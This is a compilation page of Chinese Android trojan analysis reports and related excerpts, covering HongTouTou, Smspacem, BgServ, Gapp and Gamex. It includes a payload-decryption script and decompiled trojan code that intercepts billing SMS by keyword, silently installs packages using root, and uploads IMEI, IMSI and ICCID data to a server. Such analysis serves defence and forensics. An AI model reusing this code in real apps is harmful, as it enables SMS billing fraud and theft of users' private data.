Android木马分析与编写
- 格式:pdf
- 大小:242.38 KB
- 文档页数:4
Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Adrd.a[Clicker]病毒别名: HongTouTou、ADRD病毒类型:木马样本MD5:A84997B0D220E6A63E2943DA64FFA38C样本CRC32:A42850DE样本长度:1,316,981 字节原始文件名:Newfpwap_com_liveprintslivewallpaper.apk出现时间:2011.01.27感染系统:Android 2.0及以上二、概述ADRD木马(又名HongTouTou木马)被植入十余款合法软件中(图1),通过多家论坛、下载站点分发下载实现大范围传播。
其主要行为包括:开启多项系统服务;每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息;接收控制服务器传回的指令;从数据服务器取回30个URL;依次访问这些URL,得到30个搜索引擎结果链接;在后台逐一访问这些链接;下载一个.apk安装文件到SD卡指定目录。
感染该木马的手机将产生大量网络数据流量,从而被收取流量费用。
攻击者通过增加搜索链接的访问量而获益。
用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马,并卸载相应软件将其清除。
图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布,安天已经检测到ADRD木马(又名HongTouTou木马)被植入到下列Android 软件:●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。
Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Smspacem病毒类型:木马样本MD5:60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度: 1855,053 字节发现时间:2011.05.22感染系统:Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动,被该恶意软件感染的设备会自动获取手机用户通讯录中的信息(联系人名称、电话号码、Email等),自动向其联系人电话发送短信,其内容为事先编辑好的,如“现在无法通话,世界末日即将来临”等;该软件还试图访问指定的主机服务,并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上;最后还会将被感染设备的壁纸修改为事先设定好的图像。
当被该恶意软件感染的设备接收短信时,短信将被拦截,并且该恶意软件将删除短信数据库中的短信,并且向该短信的发送地址发送一条事先编辑好的信息,如“现在无法通话,世界末日即将来临”等。
这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。
抵御木马的关键是用户要对自己的设备进行安全设置,并在安装软件后查看其权限中是否存在敏感的权限等。
图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能:有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。
●允许应用程序发送短信:恶意应用程序可能会不经您的确认就发送信息,给您产生费用。
●允许应用程序写入手机或 SIM 卡中存储的短信:恶意应用程序可借此删除您的信息。
●允许应用程序读取您的手机或 SIM 卡中存储的短信:恶意应用程序可借此读取您的机密信息。
●允许应用程序接收和处理短信:恶意应用程序可借此监视您的信息,或者将信息删除而不向您显示。
手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件,它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。
为了深入了解手机木马的工作原理和危害程度,我们进行了一系列的实验。
2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为,评估其对手机和用户的威胁程度,以及提供相应的防护建议。
3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。
通过下载一款模拟手机木马的应用程序,并在实验过程中监测其行为,我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。
4. 实验结果在实验过程中,我们观察到以下几个现象:4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息,如联系人、短信、通话记录等。
我们发现,模拟的手机木马成功地获取了手机中的敏感信息,并将其上传到了远程服务器上。
4.2 功能控制手机木马可以远程控制手机的各项功能,包括拍照、录音、发送短信等。
我们测试了模拟木马的远程控制功能,发现它能够远程激活手机的摄像头,并将拍摄到的照片发送到远程服务器。
4.3 自我传播手机木马可以通过各种方式自我传播,如通过短信、应用商店等。
我们模拟了手机木马的传播行为,并观察到它成功地向其他手机发送了包含木马应用的短信,并诱导用户下载安装。
5. 结果分析通过以上实验结果,我们可以得出以下几点结论:5.1 手机木马对用户隐私的侵犯程度非常高,能够获取用户的敏感信息并传输给攻击者。
5.2 手机木马的功能控制能力使得攻击者可以远程操控手机,可能导致更严重的后果,如偷拍、窃听等。
5.3 手机木马的自我传播能力使得其传播速度非常快,可能导致大规模的感染。
6. 防护建议为了保护手机和用户的安全,我们提出以下防护建议:6.1 安装可信任的杀毒软件,并及时更新病毒库。
6.2 不要随意下载来历不明的应用程序,尤其是通过非官方渠道下载。
6.3 注意手机的权限设置,仅授权给必要的应用。
android手机木马的提取与分析Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件,对手机木马病毒的特点、植入方式、运行状态进行了研究,利用dex2jar、jdgui等工具软件查看apk文件源代码。
结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性,提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。
智能手机给用户带来便利的同时,手机恶意软件也在各种各样的违法活动中充当了重要角色,其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。
Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。
他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现,这种恶意短信中附的网址,其实就是诱导下载一个手机软件,安装后手机内并不会显示出该应用,但其中的木马病毒已植入,后台会记录下机主的一切操作,可以随时监控到手机记录。
若机主登录网银、支付宝、微信红包等,银行卡账号、密码就都被泄露了,黑客能轻易转走资金。
此类案件近期呈现高发的趋势。
面对各种各样善于伪装隐藏的手机木马病毒,如何提取分析,并固定证据成为一项重要工作。
本文从Android手机木马病毒的特点入手,讲述了如何提取分析关键代码与配置数据,从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。
诈骗、盗窃的目标不变,那就是诱导点击安装短信的链接网址中的木马。
木马植入到目标系统,需要一段时间来获取信息,必须隐藏自己的行踪,以确保木马的整体隐藏能力,以便实现长期的目的。
主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。
然后实现了Android系统下木马攻击的各种功能,主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。
Android木马BgServ分析报告Android木马BgServ分析报告安天实验室Android木马BgServ分析报告安天实验室一、基本信息病毒名称:Trojan/Android.BgServ.a病毒别名:Fake10086病毒类型:木马样本MD5:4E70ABE0AE8A557F6623995BEF1D9BA7样本CRC32:9ED70AE2样本长度:98,684 字节出现时间:2011.03.09感染系统:Android 1.6及以上二、概述2011年3月3日,Android官方应用市场上出现“五十余款应用程序被植入恶意代码Trojan/Android.Rootcager(又名DroidDream)”。
Google随即清理了这些应用程序、删除了相关账号,并远程向被攻击手机发送名为Android Market Security Tool(软件包名com.android.vending.sectool.v1)的安全检查工具,以清除恶意代码。
2011年3月9日,国内部分软件下载站和第三方应用市场出现被植入新木马的Android Market Security Tool,该木马具有向控制服务器发送手机隐私信息、发送扣费短信、拦截中国移动和中国联通客服短信等能力。
经分析,木马的攻击代码利用了发布在Google Code的一份开源代码mmsbg。
安天实验室再次呼吁广大Android手机用户,为避免隐私泄露和财产损失,请勿从不可信来源下载安装手机软件,应尽量从软件开发者官网和Android官方市场下载。
三、样本分析样本由两部分组成:1.Android市场安全工具(com.android.vending.sectool.v1)2.恶意代码BgServ(com.mms.bg)相比于正常的Android 市场安全工具,恶意代码增加了下列权限要求:android.permission.RECEIVE_SMS:接收短信●android.permission.SEND_SMS:发送短信●android.permission.ACCESS_FINE_LOCATION:通过GPS获取精确地理位置●android.permission.ACCESS_COARSE_LOCATION:通过网络获取大概位置●android.permission.ACCESS_NETWORK_STATE:查询网络状态●android.permission.CHANGE_NETWORK_STA TE:更改网络连接●android.permission.WRITE_EXTERNAL_STORAGE:修改/删除SD卡中的内容●android.permission.WAKE_LOCK:防止手机休眠图1 正常软件所需权限图 2 恶意代码所需权限恶意代码的启动Activity为com.mms.bg.ui.FakeLanucherActivity,并将自身显示在手机的程序列表(Launcher)中。
Android木马分析报告一、样本特征:1. 基本信息该病毒伪装成正常软件,启动时开启后台监听服务,后台拦截包含指定内容的短息并修改,窃取用户隐私,同时私下发送短信,存在诱骗欺诈行为。
样本MD5:3ea3c573b257e0ede90c23ff908be1ff样本包名:com.way.xx样本证书串号:53a67b752. 特征描述该病毒伪装成正常软件,启动时开启后台监听服务,后台拦截包含指定内容的短息并修改,窃取用户隐私,同时私下发送短信,存在诱骗欺诈行为。
二、样本分析:软件安装运行:图1 图2如图1所示,安装该病毒软件后桌面上出现一个类似正常软件的图标。
运行病毒后图标消失,如图2所示。
从病毒隐藏自身的图标来看,是恶意防止用户卸载,从而达到保护自身的目的。
如图下图所示是该病毒用到的一些敏感权限。
代码分析:软件入口程序入口com.way.activity.MainActivity,进入之后onCreate方法,此处SMSListenerService短信监听服务,同时启动服务后隐藏了图标。
调用的隐藏该软件图标的方法,在该病毒运行后达到隐藏图标的目的:病毒启动短信监听服务后,会在后台监控短信的广播消息。
获取短信的来源地址和短信内容,并监控包含知道你跟内容的短信,当接收到符合条件的短信后篡改其中的短信内容通过sendThread中的run方法将获得用户隐私上传到指定的服务器:后台发送短信AlarmReceiver中短信发送线程:从指定服务器获取短信信息的方法。
将从指定服务器获取的短信发送出去:结论:此病毒运行后会隐藏自身图标,防止用户卸载。
通过开启后台服务监听户用短信,并修改短信内容,后台私自发送短信,存在欺诈嫌疑。
A NDROID木马G APP分析报告安天武研2012-02-09文档信息修订记录目录一、样本特征 (1)1. 基本信息 (1)2. 特征描述 (1)二、样本分析 (1)1. 静态分析 (1)2. 本地行为分析 (4)3. 网络行为分析 (5)三、检测和清除方法 (9)四、总结 (10)A NDROID木马G APP分析报告安天公司2012-02-09一、样本特征1.基本信息病毒名称:Trojan/Android.gapp.a[rmt]病毒类型:木马样本MD5:FC4104C17C9DC33C9FDA3CE52EDA2AFE样本CRC32:7D0AA8F1样本长度:71743 字节发现时间:2012年2月8日2.特征描述该样本对正常软件RAM优化管理器进行了恶意篡改,首次运行后在后台会访问网址http:\\,获取用来下载其他程序的URL列表保存在本地。
样本在每隔一段时间通过URL列表下载apk文件,每次下载一个,并伪造“系统更新”通知,骗取用户点击安装所下的程序。
样本每隔一段固定的时间会访问http:\\更新url 列表。
二、样本分析1.静态分析该样本在正常软件上进行了捆绑的操作,如下图所示,所有的恶意代码都集中在com.google.process.gapp包中。
(1)AndroidManifest.xml分析敏感权限:android.permission.RECEIVE_BOOT_COMPLETED 允许程序自启动恶意模块:接收器:com.google.process.gapp.A服务:com.google.process.gapp.GoogleServicesFrameworkService(2)接收器com.google.process.gapp.A分析该接收器监听系统启动的intent,当系统启动并且检测到sd卡时,开启服务com.google.process.gapp.GoogleServicesFrameworkService。
Android Gamex木马分析报告图/文非虫5月刚开始就弄到了这个Gamex木马样本,该样本破坏性不大,不过对于安全分析人员来说,这可是很好的研究素材,今天我就将这个样本的完整分析过程拿来与大家分享。
工具ApkTool、dex2jar、DJ Java Decompiler分析必备python2.6编写解密脚本分析这个样本通过捆绑软件SD-Booster来达到感染的目的,在安装运行被感染的SD-Booster时,木马就会自动安装进Android系统,为了尽快找到感染部分,下载未感染的SD-Booster进行反编译对比,结果如图1所示:图 1程序被植入了“com.android.md5”与“com.gamex.inset”两个包,首先找到植入程序的加载处,在SDBoost 类的onCreate()方法中插入了如下代码:public void onCreate(Bundle paramBundle) {super.onCreate(paramBundle);A.b(this);…}A是“com.gamex.inset”包中的类,A.b()方法代码如下:public static void b(Context paramContext){context = paramContext;Intent localIntent = new Intent(paramContext, Settings.class);ComponentName localComponentName = paramContext.startService(localIntent);}直接启动的是Settings.class服务,这个服务很简单,启动代码是这样的:public void onStart(Intent paramIntent, int paramInt){super.onStart(paramIntent, paramInt);new Settings.1(this).start();}class Settings$1 extends Thread{public void run(){if ((!A.a) && (A.c()) && (A.d(A.context))){A.a = 1;Settings localSettings = this.this$0;new C(localSettings).start();}while (true){return;this.this$0.stopSelf();}}}A.a初始化为0,用来判断木马是否已经运行,A.c()只有一行代码判断SD卡是否已经准备好,为后面的病毒下载做准备,A.d()判断木马程序“com.android.setting”是否已经安装,如果没有安装且满足上面的条件就启动C线程来安装木马,C类的run()方法在Dex2jar中显示不了,在DJ Java Decompiler中可以看到完整的反编译的代码,线程通过context.getAssets().open("logos.png")读取木马文件,然后通过解密运算得到最终的apk安装文件,解密代码我用python实现如下:# -*- coding:utf-8 -*-import sysdef main(filename):infile = file(filename,"rb")outfile = file(filename[:-4]+".apk","wb")while1:c = infile.read(1)if not c:breakc = chr(ord(c) ^ 18)outfile.write(c)outfile.close()infile.close()if __name__ == '__main__':main(sys.argv[1])解密只是将整个文件与0x12异或而以,运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。
Android系统的智能手机木马攻防机制的分析的开题报告一、选题背景Android系统是当前智能手机市场上使用最广泛的操作系统,在其背后的应用商店上,数不尽的应用在满足人们生活需求的同时,也不可避免地将各种恶意软件(例如木马)植入其中。
而正是这些恶意软件的存在,让人们的个人隐私、财产等重要信息面临着安全威胁。
为保障Android系统用户的信息安全,需对其存在的木马进行攻防机制的研究,以及探索相应的安全策略和技术手段。
本文将主要研究Android系统的智能手机木马攻防机制。
二、研究目的本文旨在研究Android系统的智能手机木马攻防机制,考察其主要特征和安全威胁,并提出相应的解决方案。
三、研究内容1. Android系统与智能手机木马的关系分析2. 智能手机木马的主要攻击手段和安全威胁分析3. Android系统智能手机木马检测与防范技术分析4. Android系统智能手机木马攻防实验及分析四、研究方法本文将采用文献资料法、实证研究法和案例分析法等研究方法,运用Android Studio等开发工具实现Android系统智能手机木马攻防实验,验证所提出的安全策略和技术手段是否有效。
五、预期成果1. 对当前Android系统智能手机木马形成了科学全面的认识。
2. 提出针对当前智能手机木马安全威胁的解决方案。
3. 提高用户对Android系统的信息安全认知和防范能力。
六、研究意义1. 面对日益严峻的安全威胁,研究智能手机木马攻防机制改进相应的安全技术及手段,极有必要性。
2. 提高用户对于Android系统的信息安全认知,改变用户依赖第三方应用商店下载应用的现状,更换为正式官网下载应用。
3. 本文的研究成果可以为Android系统研究现有的安全机制提供一定的促进作用,对于公司同时也是具有管理启示意义的。
4. 研究结果对于智能手机木马的防范,提高用户信息安全保护水平有着积极的推进作用。
七、研究进度安排第一、二周:查阅相关文献,了解Android系统的智能手机木马攻防机制的研究进展;第三、四周:分析智能手机木马的攻击手段和安全威胁特点;第五、六周:探讨Android系统智能手机木马检测与防范技术;第七、八周:选取典型案例,运用实证研究方法进行智能手机木马攻防实验;第九、十周:总结分析研究结果,撰写论文;第十一、十二周:完成论文修改工作。
Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。
Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();(2). 获取ROOT 权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK();contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。